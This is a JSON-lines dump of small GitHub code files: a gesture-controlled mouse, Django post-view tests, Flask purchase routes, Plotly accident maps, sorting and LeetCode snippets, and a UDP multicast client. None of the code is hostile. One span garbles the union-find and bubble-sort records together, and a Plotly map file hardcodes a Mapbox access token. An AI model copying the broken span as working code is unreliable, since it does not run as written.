= htm.handDetector(maxHands=1, detectionConfidence=0.8)\nwScr, hScr = autopy.screen.size()\nframeReducedW = int(widthCap / 2) + 100\nframeReducedH = 100\nsmoothen = 5\nprevX, prevY = 0, 0\nshooting = False\n\nwhile capture.isOpened():\n global currY, currX, x3, y3, x1, y1\n success, vid = capture.read()\n\n hands, _ = detector.detectHands(vid)\n locations, bbox = detector.findLocations(vid)\n\n if len(locations):\n x1, y1 = locations[8][1:]\n x2, y2 = locations[12][1:]\n cv2.rectangle(vid, (0, frameReducedH), (frameReducedW, heightCap - frameReducedH),\n (255, 0, 255), 2)\n\n fingers = detector.fingersUp(hands[0])\n\n if fingers[1] == 1 and (fingers[2] + fingers[3] + fingers[4]) == 0:\n moveMouse()\n if shooting:\n autopy.mouse.toggle(autopy.mouse.Button.LEFT, down=False)\n shooting = False\n\n if fingers[1] + fingers[2] == 2 and fingers[3] + fingers[4] == 0:\n # distance, vid, params = detector.findDistance(8, 12, vid)\n autopy.mouse.toggle(autopy.mouse.Button.LEFT, down=True) # Start Shooting\n shooting = True\n moveMouse()\n\n currTime = time.time()\n fps = 1 / (currTime - prevTime)\n prevTime = currTime\n cv2.putText(vid, str(int(fps) * 2), org=(20, 50), fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=2, color=(255, 0, 255), thickness=3)\n cv2.imshow(\"Video\", vid)\n cv2.waitKey(1)\n\nvid.release()\ncv2.destroyAllWindows()\n","repo_name":"priyansh17/VirtualhandControlForGames","sub_path":"VirtualMouse.py","file_name":"VirtualMouse.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10451309442","text":"#1922 네트워크 연결\nimport sys\n\n# find\ndef find(arr,x):\n if ds[x] != x:\n return find(arr,arr[x])\n return x\n\ndef union(arr,a,b):\n a = find(arr,a)\n b= find(arr,b)\n if a other:\n lst[i], lst[j], one, other = (other, one) * 2\n\n return lst\n\n\nif __name__ == '__main__':\n lst = get_random_list(0, 100, 10)\n print(lst)\n print(sort(lst))\n","repo_name":"urm8/ads","sub_path":"algo/sort/bubble.py","file_name":"bubble.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75162478133","text":"import turtle as t\n\ncolors = [\"red\", \"yellow\", \"blue\", \"green\"]\n\nt.pen()\nt.bgcolor(\"black\")\nfor x in range(100):\n t.pencolor(colors[x % 4])\n t.circle(x)\n t.left(91)\nt.exitonclick()\n","repo_name":"BayanganPikiran/coder_pro-course_1-L5","sub_path":"ColorCircleSpiral/ColorCircleSpiral.py","file_name":"ColorCircleSpiral.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74164083894","text":"import shutil\nimport tempfile\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.cache import cache\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.test import Client, TestCase, override_settings\nfrom django.urls import reverse\nfrom posts.models import Comment, Follow, Group, Post\n\nUser = get_user_model()\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\n\nclass PostTemplateTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n cls.author = User.objects.create(username='author')\n cls.author2 = User.objects.create(username='author2')\n cls.group = Group.objects.create(\n title='Группа',\n slug='slug',\n description='Описание группы',\n )\n cls.post = Post.objects.create(\n text='Пост',\n author=cls.author,\n group=cls.group,\n )\n cls.post2 = Post.objects.create(\n text='Пост без группы',\n author=cls.author2,\n )\n\n def setUp(self):\n self.auth_client = Client()\n self.auth_client.force_login(self.author)\n cache.clear()\n\n def test_correct_template(self):\n templates_pages_names = {\n '': 'posts/index.html',\n (\n reverse('posts:group_list', kwargs={'slug': 'slug'})\n ): 'posts/group_list.html',\n (\n reverse('posts:profile', kwargs={'username': 'author'})\n ): 'posts/profile.html',\n (\n reverse('posts:post_detail', kwargs={'post_id': self.post.pk})\n ): 'posts/post_detail.html',\n (\n reverse('posts:post_edit', kwargs={'post_id': self.post.pk})\n ): 'posts/create_post.html',\n reverse('posts:post_create'): 'posts/create_post.html',\n }\n for reverse_name, template in templates_pages_names.items():\n with self.subTest(reverse_name=reverse_name):\n response = self.auth_client.get(reverse_name)\n self.assertTemplateUsed(response, template)\n\n def test_404_custom_page(self):\n response = self.auth_client.get('un-existing/page/')\n self.assertTemplateUsed(response, 'core/404.html')\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass PostContextTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.author = User.objects.create(username='author')\n cls.author2 = User.objects.create(username='author2')\n cls.group = Group.objects.create(\n title='Группа',\n slug='slug',\n description='Описание группы',\n )\n small_gif = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x01\\x00'\n b'\\x01\\x00\\x00\\x00\\x00\\x21\\xf9\\x04'\n b'\\x01\\x0a\\x00\\x01\\x00\\x2c\\x00\\x00'\n b'\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x02'\n b'\\x02\\x4c\\x01\\x00\\x3b'\n )\n uploaded = SimpleUploadedFile(\n name='small.gif',\n content=small_gif,\n content_type='image/gif'\n )\n cls.post = Post.objects.create(\n text='Пост',\n author=cls.author,\n group=cls.group,\n image=uploaded,\n )\n cls.post2 = Post.objects.create(\n text='Пост без группы',\n author=cls.author2,\n )\n Comment.objects.create(\n text='Комментарий',\n author=cls.author,\n post=cls.post\n )\n\n @classmethod\n def tearDownClass(cls):\n super(PostContextTests, cls).tearDownClass()\n cache.clear()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def setUp(self):\n self.auth_client = Client()\n self.auth_client.force_login(self.author)\n self.auth_client2 = Client()\n self.auth_client2.force_login(self.author2)\n cache.clear()\n\n def test_correct_context_follow(self):\n self.auth_client.post(\n reverse(\n 'posts:profile_follow',\n kwargs={'username': self.author2.username}\n )\n )\n subs1 = Follow.objects.filter(user=self.author)\n self.auth_client.post(\n reverse(\n 'posts:profile_unfollow',\n kwargs={'username': self.author2.username}\n )\n )\n subs2 = Follow.objects.filter(user=self.author)\n\n self.assertNotEqual(subs1, subs2)\n\n def test_correct_context_unique_follow(self):\n self.auth_client.post(\n reverse( # юзер1 подписывается на юезра2\n 'posts:profile_follow',\n kwargs={'username': self.author2.username}\n )\n )\n self.auth_client2.post(\n reverse( # юзер2 подписывается на юезра1\n 'posts:profile_follow',\n kwargs={'username': self.author.username}\n )\n )\n form_data = {'text': 'Text'}\n self.auth_client2.post( # юзер2 пишет пост\n reverse('posts:post_create'), data=form_data, follow=True\n )\n response1 = self.auth_client.get(reverse('posts:index'))\n post2 = response1.context['page_obj'][0] # сохраняем пост юзера2\n\n form_data = {'text': 'Текст'}\n self.auth_client.post( # юзер1 пишет пост\n reverse('posts:post_create'), data=form_data, follow=True\n )\n\n cache.clear()\n \"\"\"\n пользователь создаёт пост, и тут же ищет его в posts:index,\n а его там нет!\n \"\"\"\n\n response1 = self.auth_client.get(reverse('posts:index'))\n post1 = response1.context['page_obj'][0] # сохраняем пост юзера1\n\n response1 = self.auth_client.get(reverse('posts:follow_index'))\n post_follow_2 = response1.context['page_obj'][0]\n # юзер1 смотрит последний пост юзера2\n response2 = self.auth_client2.get(reverse('posts:follow_index'))\n post_follow_1 = response2.context['page_obj'][0]\n # юзер1 смотрит последний пост юзера2\n self.assertEqual(post2, post_follow_2)\n self.assertEqual(post1, post_follow_1)\n\n def test_correct_context_index(self):\n response = self.auth_client.get(reverse('posts:index'))\n\n objects = response.context['page_obj']\n self.assertEqual(len(objects), 2)\n\n first_obj = objects[1]\n post_author_0 = first_obj.author\n post_group_0 = first_obj.group\n post_text_0 = first_obj.text\n post_image_0 = first_obj.image\n self.assertEqual(post_author_0, self.author)\n self.assertEqual(post_group_0.title, 'Группа')\n self.assertEqual(post_text_0, 'Пост')\n self.assertEqual(post_image_0, 'posts/small.gif')\n\n def test_correct_context_group_list(self):\n response = self.auth_client.get(\n reverse('posts:group_list', kwargs={'slug': 'slug'})\n )\n objects = response.context['page_obj']\n\n title_obj = response.context['group']\n self.assertEqual(title_obj, self.group)\n\n first_obj = objects[0]\n post_author_0 = first_obj.author\n post_text_0 = first_obj.text\n post_image_0 = first_obj.image\n self.assertEqual(post_author_0, self.author)\n self.assertEqual(post_text_0, 'Пост')\n self.assertEqual(post_image_0, 'posts/small.gif')\n\n def test_correct_context_profile(self):\n response = self.auth_client.get(\n reverse('posts:profile', kwargs={'username': self.author.username})\n )\n objects = response.context['page_obj']\n\n self.assertEqual(response.context['author'], self.author)\n\n first_obj = objects[0]\n post_author_0 = first_obj.author\n post_text_0 = first_obj.text\n post_image_0 = first_obj.image\n self.assertEqual(post_author_0, self.author)\n self.assertEqual(post_text_0, 'Пост')\n self.assertEqual(post_image_0, 'posts/small.gif')\n\n def test_correct_context_post_detail(self):\n response = self.auth_client.get(\n reverse('posts:post_detail', kwargs={'post_id': self.post.id})\n )\n\n first_obj = response.context['post']\n post_author_0 = first_obj.author\n post_text_0 = first_obj.text\n post_image_0 = first_obj.image\n self.assertEqual(post_author_0, self.author)\n self.assertEqual(post_text_0, 'Пост')\n self.assertEqual(post_image_0, 'posts/small.gif')\n\n context = response.context['comments'][0]\n comm_text = context.text\n comm_author = context.author\n self.assertEqual(comm_text, 'Комментарий')\n self.assertEqual(comm_author, self.author)\n\n def test_correct_context_post_create(self):\n response = self.auth_client.get(reverse('posts:post_create'))\n form_fields = {\n 'text': forms.fields.CharField,\n 'group': forms.models.ModelChoiceField,\n 'image': forms.fields.ImageField,\n }\n for value, expected in form_fields.items():\n with self.subTest(value=value):\n form_field = response.context['form'].fields[value]\n self.assertIsInstance(form_field, expected)\n\n def test_correct_context_post_edit(self):\n response = self.auth_client.get(\n reverse('posts:post_edit', kwargs={'post_id': 1})\n )\n form_fields = {\n 'text': forms.fields.CharField,\n 'group': forms.models.ModelChoiceField,\n }\n for value, expected in form_fields.items():\n with self.subTest(value=value):\n form_field = response.context['form'].fields[value]\n self.assertIsInstance(form_field, expected)\n is_edit = response.context['is_edit']\n self.assertEqual(is_edit, True)\n\n def test_cache_index(self):\n response = self.auth_client.get(reverse('posts:index'))\n posts = response.content\n Post.objects.create(\n text='Новый пост',\n author=self.author2,\n )\n response_old = self.auth_client.get(reverse('posts:index'))\n posts_old = response_old.content\n self.assertEqual(posts_old, posts)\n cache.clear()\n response_new = self.auth_client.get(reverse('posts:index'))\n posts_new = response_new.content\n self.assertNotEqual(posts_old, posts_new)\n\n\nclass PostPaginatorTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.author = User.objects.create(username='author')\n cls.author2 = User.objects.create(username='author2')\n cls.group = Group.objects.create(\n title='Группа',\n slug='slug',\n description='Описание группы',\n )\n Post.objects.create(\n text='Пост',\n author=cls.author,\n group=cls.group,\n )\n Post.objects.create(\n text='Пост без группы',\n author=cls.author2,\n )\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n\n def setUp(self):\n self.auth_client = Client()\n self.auth_client.force_login(self.author)\n cache.clear()\n\n def test_correct_context_profile(self):\n response = self.auth_client.get(\n reverse('posts:profile', kwargs={'username': 'author'})\n )\n objects = response.context['page_obj']\n self.assertEqual(len(objects), 1)\n\n def test_correct_context_group_list(self):\n response = self.auth_client.get(\n reverse('posts:group_list', kwargs={'slug': 'slug'})\n )\n objects = response.context['page_obj']\n self.assertEqual(len(objects), 1)\n\n def test_correct_context_index(self):\n response = self.auth_client.get(reverse('posts:index'))\n objects = response.context['page_obj']\n self.assertEqual(len(objects), 2)\n\n def test_many_pages(self):\n for i in range(12):\n Post.objects.create(\n text=f'Пост {i+2}',\n author=self.author,\n )\n response = self.auth_client.get(reverse('posts:index'))\n objects = response.context['page_obj']\n self.assertEqual(len(objects), 10)\n response = self.auth_client.get('http://127.0.0.1:8000/?page=2')\n objects = response.context['page_obj']\n self.assertEqual(len(objects), 4)\n","repo_name":"Jelister203/yatube_final","sub_path":"yatube/posts/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":12864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18215346152","text":"class Solution:\n def longestBeautifulSubstring(self, word: str) -> int:\n ans = 0\n count = 1\n\n l = 0\n for r in range(1, len(word)):\n curr = word[r]\n prev = word[r - 1]\n if curr >= prev:\n if curr > prev:\n count += 1\n if count == 5:\n ans = max(ans, r - l + 1)\n else:\n count = 1\n l = r\n\n return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/1839. Longest Substring Of All Vowels in Order/1839.py","file_name":"1839.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"21787093184","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# import library\nimport pandas as pd\nimport plotly \nimport plotly.graph_objs as go \nimport json\nfrom urllib.request import urlopen\nimport plotly.express as px \nimport datetime\nfrom joblib import load\n\n\n\n\ndef data_trait():\n df = pd.read_csv('Acc_route/data/data.csv')\n df.dropna(subset=[\"annee\", \"grav\", \"sexe\", \"an_nais\", \"dep\"], inplace=True)\n df = df.astype({\n 'annee': int,\n 'dep': str,\n 'sexe': int,\n 'grav': int,\n 'an_nais': int\n })\n return df\n\ndef nb_usagers(year, departement, gender, gravity, age1, age2):\n df = data_trait()\n year_now = datetime.datetime.now().year\n df['age'] = year_now - df[\"an_nais\"]\n if age1 != 0:\n df = df[df['age'] >= age1]\n if age2 != 0:\n df = df[df['age'] <= age2]\n df = df[df['annee'] == year]\n df = df[df['dep'] == departement]\n df = df[df['sexe'] == gender] \n df = df[df['grav'] == gravity]\n df = df.groupby(by=[\"age\"])[\"grav\"].size().reset_index(name=\"count_grav\")\n df_temp = pd.DataFrame(df)\n return df_temp\n\n\n\n\ndef plot(year , departement, gender, gravity, age1, age2, name, color):\n\n df = nb_usagers(year, departement, gender, gravity, age1, age2)\n fig = go.Bar(\n x = df[\"age\"],\n y = df[\"count_grav\"],\n name = name,\n marker = dict(color = color ,\n line = dict(color ='rgb(0,0,0)',width =1.5)))\n data = [fig]\n layout = go.Layout(barmode = \"group\",\n title= \"\",\n xaxis=dict(title='Age'),\n yaxis=dict( title=\"Nombre D'usager\"))\n fig = go.Figure(data = data, layout = layout)\n graphJSON = json.dumps (fig, cls = plotly.utils.PlotlyJSONEncoder)\n return graphJSON\n\ndef carte_france():\n\n with urlopen('https://france-geojson.gregoiredavid.fr/repo/departements.geojson') as response:\n geojson = json.load(response)\n df = data_trait()\n\n names=['code_departement', 'nom_departement', 'code_region', 'nom_region']\n df1 = pd.read_csv('Acc_route/data/departements-france.csv',\n header=None, skiprows=[0], names=names)\n\n\n df['dep'] = df['dep'].str.replace(r'\\D+', '', regex=True)\n df['dep'] = df['dep'].astype(int)\n df = df.sort_values(by='dep', ascending = True)\n\n # df['dep']=df.dep//10\n\n df1 = pd.DataFrame(df1[['code_departement','nom_departement','code_region',\n 'nom_region']])\n df1['code_departement'] = df1['code_departement'].str.lstrip('0')\n df1['code_departement'] = df1['code_departement'].str.replace(r'\\D+', '', regex=True)\n df1['code_departement'] = df1['code_departement'].astype(int)\n # df2 = pd.concat([df, df1], axis =1)\n df2 = pd.merge(df,df1, left_on='dep', right_on='code_departement', how='inner')\n\n year_now = datetime.datetime.now().year\n df2[\"age\"] = year_now - df[\"an_nais\"]\n df2 = df2.fillna(0)\n df2['age'] = df2['age'].astype(int)\n \n df3 = df2.groupby(by=[\"age\"])[\"grav\"].size().reset_index(name=\"count_grav\")\n df4 = pd.merge(df2,df3, left_on='age', right_on='age', how='inner')\n df_temp = pd.DataFrame(df4)\n return df_temp, geojson\n\n\ndef plot_carte_nb_acc():\n # Creat figure\n df, geojson = carte_france()\n fig = px.choropleth_mapbox(df,geojson= geojson\n ,color=df[\"count_grav\"]\n ,locations=df[\"dep\"]\n ,featureidkey=\"properties.code\"\n ,hover_name = df['nom_departement']\n , color_continuous_scale = [(0,\"purple\"), (1,\"red\")]\n #,color_continuous_midpoint = 4\n ,range_color = (0, 2000)\n #,title=\"NOMBRE TOTALE D'USAGERS ACCIDENTÉS PAR DEPARTEMENT\"\n ,center={\"lat\": 46.3223, \"lon\": 1.2549}\n ,mapbox_style=\"carto-positron\", zoom=4.5)\n fig.update_layout(margin={\"r\":0,\"t\":0,\"l\":0,\"b\":0})\n\n graphJSON = json.dumps (fig, cls = plotly.utils.PlotlyJSONEncoder)\n\n return graphJSON\n\ndef plot_carte_loc():\n\n df2, geojson = carte_france()\n df2['lat'] = df2['lat'].apply(lambda x: str(str(x).replace(',', '.')))\n df2['long'] = df2['long'].apply(lambda x: str(str(x).replace(',', '.')))\n df2['lat']= df2['lat'].astype(float, errors = 'ignore')\n df2['long'] = pd.to_numeric(df2['long'], errors='coerce').abs()\n df2 = df2[df2['long'] != 0] \n df2 = df2[df2['lat'] != 0]\n df3 = df2[df2['long'] > 10]\n df3['lat'] = df3['lat']/1000000 \n df2[df2['long'] > 10] = df3\n site_lat = df2['lat']\n site_lon = df2['long']\n locations_name = df2['nom_departement']\n fig = go.Figure()\n mapbox_access_token = \"pk.eyJ1IjoiaGFjaGVtMTMiLCJhIjoiY2tiZ3Jxd2hjMTJjYTJyb293MWp2ZjN6NCJ9.6zbhZNrucd-yITpe6WIYsA\"\n fig.add_trace(go.Scattermapbox(lat=site_lat,lon=site_lon,mode='markers',marker=go.scattermapbox.Marker(size=5,color='rgb(92, 189, 231)',opacity=0. ),text=locations_name,hoverinfo='text'))\n\n fig.add_trace(go.Scattermapbox(lat=site_lat,lon=site_lon,mode='markers', marker=go.scattermapbox.Marker(size=3, color='rgb(242, 177, 172)', opacity=0.7),hoverinfo='none'))\n\n fig.update_layout(title='',autosize=True,hovermode='closest',showlegend=False,mapbox=dict(accesstoken=mapbox_access_token, bearing=0, center=dict( lat=46.3223, lon=1.2549), pitch=0, zoom=3.5, style='light'),)\n graphJSON = json.dumps (fig, cls = plotly.utils.PlotlyJSONEncoder)\n return graphJSON\n\ndef prediction(year, gender, age, localisation, intersection, lumiere, departement): \n files = 'Acc_route/data/rfc1_prediction_1.joblib' + 'Acc_route/data/rfc1_prediction_2.joblib' + 'Acc_route/data/rfc1_prediction_3.joblib' + 'Acc_route/data/rfc1_prediction_4.joblib' \n rfc = load(files)\n X = [[year, gender, age, localisation, intersection, lumiere, departement]]\n pred = rfc.predict_proba(X)\n if pred[0][0] > pred[0][1]:\n if pred[0][0] > 0.6:\n predict = 1\n else :\n predict = 0\n elif pred[0][0] < pred[0][1]:\n if pred[0][1] > 0.6:\n predict = 2\n else:\n predict = 0\n return predict","repo_name":"hachemmosbah/Accidentologies","sub_path":"src/Acc_route/data_vis.py","file_name":"data_vis.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73342522611","text":"from flask import Blueprint,jsonify,request,Response\nfrom Application.models import Achat, DetailAchat,Produit,detailachat_schema,detailachats_schema,joindetailachats_schema\nfrom Application.__init__ import db\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\n\n#Creating the blueprint\ndetailachat = Blueprint('detailachat',__name__)\n\n@detailachat.route('/detailachat/get', methods =['GET'])\ndef get_detailachats():\n detailachats= DetailAchat.query.all()\n results = detailachats_schema.dump(detailachats)\n return jsonify(results)\n\n\n@detailachat.route('/detailachat/getbyachat/' , methods = ['GET'])\ndef get_datailachat_byachatId(achat_id):\n datailachat_to_get = DetailAchat.query.filter_by(achat_id=achat_id)\n return detailachats_schema.jsonify(datailachat_to_get)\n\n\n\n@detailachat.route('/detailachat/add' , methods=['POST'])\ndef add_detailachat(): \n achat_id = request.form.get('achat_id')\n quantite=request.form.get('quantite')\n id_produit=request.form.get('id_produit')\n\n \n detailachat_to_add = DetailAchat(achat_id=achat_id,quantite=quantite,id_produit=id_produit)\n db.session.add(detailachat_to_add)\n db.session.commit()\n return detailachat_schema.jsonify(detailachat_to_add)\n\n@detailachat.route('/detailachat/delete/' , methods=['DELETE'] )\ndef delete_detailachat(id):\n detailachat_to_delete = DetailAchat.query.get(id)\n db.session.delete(detailachat_to_delete)\n db.session.commit()\n return \"object deleted successfully !\"\n\n@detailachat.route('/detailachat/update/', methods=['PUT'])\ndef update_detailachat(id):\n detailachat_to_update=DetailAchat.query.get(id)\n achat_id = request.form.get('achat_id')\n quantite=request.form.get('quantite')\n id_produit=request.form.get('id_produit')\n detailachat_to_update.achat_id=achat_id\n detailachat_to_update.quantite=quantite\n detailachat_to_update.id_produit=id_produit\n\n\n db.session.commit()\n return detailachat_schema.jsonify(detailachat_to_update)\n\n@detailachat.route('/detailachat/getall', methods =['GET'])\ndef get_achat_join_detailachat():\n detailachats = DetailAchat.query.join(Achat, DetailAchat.achat_id == Achat.achat_id)\\\n .add_columns(DetailAchat.detailachat_id,DetailAchat.achat_id,Achat.user_id, Achat.date_Achat, Achat.prix_Total_Achat,DetailAchat.id_produit,DetailAchat.quantite)\\\n .join(Produit, DetailAchat.id_produit==Produit.id_produit)\\\n .add_columns(Produit.nom_produit,Produit.prix_produit)\\\n .all()\n\n results = joindetailachats_schema.dump(detailachats)\n return jsonify(results)\n","repo_name":"Ilyes-Cheikh/Customers-feedbacks-analytics","sub_path":"backend/Application/APIs/DetailAchat/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72365410933","text":"import logging\n\nfrom extract import dump_tiles_from_boundary_file\n\n\n\nif __name__ == '__main__':\n CYLS = [\n (14, True), \n (19, True), \n (23, True), \n (27, True), \n (15, True), \n (3, False), \n (10, False), \n (7, False), \n (12, False), \n (25, False), \n ]\n filename = \"Width15/6333419-halfBdry_rev.txt\"\n\n logging.basicConfig(level=logging.INFO)\n\n for height, bottom in CYLS:\n with open(filename) as source_f:\n tiles = dump_tiles_from_boundary_file(source_f, height, bottom)\n print(\"CYL_15_%s_%d = %s\" % (\"BOTTOM\" if bottom else \"TOP\", height, tiles))\n","repo_name":"jwg4/t-tetromino","sub_path":"rh/Width13-15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18865005363","text":"#Write a python program to:\r\n# Get user input of a first name and last name\r\n# Print the names reversed, but in the same order\r\n# eg. Graham Smith = maharG htimS\r\n#Try to find more than one method\r\nfirstName = input('First name: ')\r\nlastName = input('Last name: ')\r\nprint(firstName,'=',firstName[::-1])\r\nprint(lastName,'=',lastName[::-1])\r\n\r\nname = input('First name and last name')\r\nwords = name.split(' ')\r\nfor word in words:\r\n lastIndex = len(word) -1\r\n for index in range(lastIndex, -1, -1):\r\n print(word[index], end=' ')\r\n print(end=' ')\r\nprint(end='\\n')\r\n\r\nname = input('First name and last name')\r\nfirst, last = name.split(' ')\r\nprint(first[::-1], last[::-1])","repo_name":"R1G0x/python-practice","sub_path":"Basic examples/nameReverser.py","file_name":"nameReverser.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24396683790","text":"import json\nimport shutil\nimport sys\nfrom collections import Counter\nfrom pathlib import Path\n\nfrom loguru import logger\n\nfrom src.data import DATA_DIR\nfrom src.utils.io import read_json\n\n\nclass OrganizeFiles:\n \"\"\"this class is used to clean a directories based on extensions\"\"\"\n def __init__(self):\n ext_dirs = read_json(DATA_DIR / 'extensions.json')\n self.extensions_dest = {}\n for dir_name, ext_list in ext_dirs.items():\n for ext in ext_list :\n self.extensions_dest[ext] = dir_name\n\n def __call__(self, directory):\n \"\"\"Organize files in a directory by moving them to their respective directories\"\"\"\n\n direcory = Path(directory)\n if not direcory.exists():\n raise FileNotFoundError(\"The directory does not exist\")\n logger.info(\"Organizing the files in the {directory}...\")\n for file_path in direcory.iterdir():\n #ignore directiries\n if file_path.is_dir():\n continue\n #ignore hidden files\n if file_path.name.startswith('.'):\n continue\n\n if file_path.suffix not in self.extensions_dest :\n DEST_DIR = direcory / 'others'\n else :\n #makes destionation directories\n DEST_DIR = direcory / self.extensions_dest[file_path.suffix]\n DEST_DIR.mkdir(exist_ok=True)\n logger.info(f\"Moving {file_path} to {DEST_DIR}\")\n shutil.move(str(file_path), str(DEST_DIR))\n #moves files to the directories\n pass\n\nif __name__ == \"__main__\":\n org_files = OrganizeFiles()\n org_files(sys.argv[1])\n logger.info(\"Done!\")\n","repo_name":"saeed-at/Clean_Directory","sub_path":"src/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20785382828","text":"\nimport re\nimport sys\nimport struct\nimport socket\nfrom typing import ByteString\n\ncontroltronic_address = \"224.0.43.54\"\ncontroltronic_port = 43541\n\ndef controltronicSocket(address: str, port: int) -> socket.socket:\n # Open the udp multicast socket\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n s.settimeout(0.025)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n if sys.platform == 'win32':\n s.bind(('', port))\n else:\n s.bind((address, port))\n mreq = struct.pack(\"4sl\", socket.inet_aton(address), socket.INADDR_ANY)\n s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\n s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 5)\n return s\n\n# Splits a UDP payload data into a stream of controltronic packets\n# Each packet starts with b'CT' and ends with b'\\n'\ndef split_data(data: bytes):\n for match in re.finditer(br\"CT.+?\\n(?=(C|\\Z))\", data, re.DOTALL):\n yield match.group(0)\n\nclass UdpInterface:\n\n def __init__(self, address: str = controltronic_address, port: int = controltronic_port) -> None:\n self.address = address\n self.port = port\n self.socket = controltronicSocket( address, port )\n\n def peek(self, len: int = 10240, timeout: int = 0.025) -> ByteString:\n self.socket.settimeout(timeout)\n return self.socket.recv(len, socket.MSG_PEEK)\n\n def read(self, len: int = 10240, timeout: int = 0.025) -> ByteString:\n try:\n self.socket.settimeout(timeout)\n #print(f\"Buffer now has: \" + str(self.peek()))\n return self.socket.recv(len)\n except socket.timeout as e:\n raise TimeoutError() from e\n\n def write(self, data: ByteString) -> None:\n if isinstance(data, bytes) or isinstance(data, ByteString):\n bytes_data = data\n elif isinstance(data, list):\n bytes_data = bytes(data)\n else:\n raise NotImplementedError()\n \n self.socket.sendto(bytes_data, (self.address, self.port))\n # Drain the socket of what we just sent\n rxData = self.peek(len(bytes_data))\n if rxData == bytes_data:\n self.read(len(bytes_data))\n","repo_name":"AODtorusan/screentronic","sub_path":"src/screentronic/UdpInterface.py","file_name":"UdpInterface.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12399630712","text":"import pytest\nfrom campcleanup import CampCleanup\n\n@pytest.mark.parametrize(\"assignmentPair, expected\", [\n (\"2-4,6-8\", [[\"2\",\"3\",\"4\"], [\"6\",\"7\",\"8\"]]),\n (\"2-3,4-5\", [[\"2\",\"3\"], [\"4\",\"5\"]]),\n (\"5-7,7-9\", [[\"5\",\"6\",\"7\"], [\"7\",\"8\",\"9\"]]),\n (\"2-8,3-7\", [[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\"], [\"3\",\"4\",\"5\",\"6\",\"7\"]]),\n (\"6-6,4-6\", [[\"6\"], [\"4\",\"5\",\"6\"]]),\n (\"2-6,4-8\", [[\"2\",\"3\",\"4\",\"5\",\"6\"], [\"4\",\"5\",\"6\",\"7\",\"8\"]])\n])\ndef test_parse_creates_correct_structure(assignmentPair, expected):\n cc = CampCleanup()\n assert cc.parse(assignmentPair) == expected\n\ndef test_findFullyOverlappedAssignments_finds_correct_overlaps():\n assignments = [\n \"2-4,6-8\",\n \"2-3,4-5\",\n \"5-7,7-9\",\n \"2-8,3-7\",\n \"6-6,4-6\",\n \"2-6,4-8\"\n ]\n\n cc = CampCleanup()\n cc.load(assignments)\n\n overlaps = cc.findFullyOverlappedAssignments()\n assert overlaps == [[[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\"], [\"3\",\"4\",\"5\",\"6\",\"7\"]], [[\"6\"], [\"4\",\"5\",\"6\"]]]\n assert len(overlaps) == 2\n\ndef test_findFullyOverlappedAssignments_finds_correct_overlaps_using_provided_input_file():\n f = open(\"input.txt\", \"r\")\n assignments = f.readlines()\n f.close()\n\n cc = CampCleanup()\n cc.load(assignments)\n assert len(cc.findFullyOverlappedAssignments()) == 526\n\ndef test_findAnyOverlappedAssignments_finds_correct_overlaps():\n assignments = [\n \"2-4,6-8\",\n \"2-3,4-5\",\n \"5-7,7-9\",\n \"2-8,3-7\",\n \"6-6,4-6\",\n \"2-6,4-8\"\n ]\n\n cc = CampCleanup()\n cc.load(assignments)\n\n overlaps = cc.findAnyOverlappedAssignments()\n assert overlaps == [\n [[\"5\",\"6\",\"7\"], [\"7\",\"8\",\"9\"]],\n [[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\"], 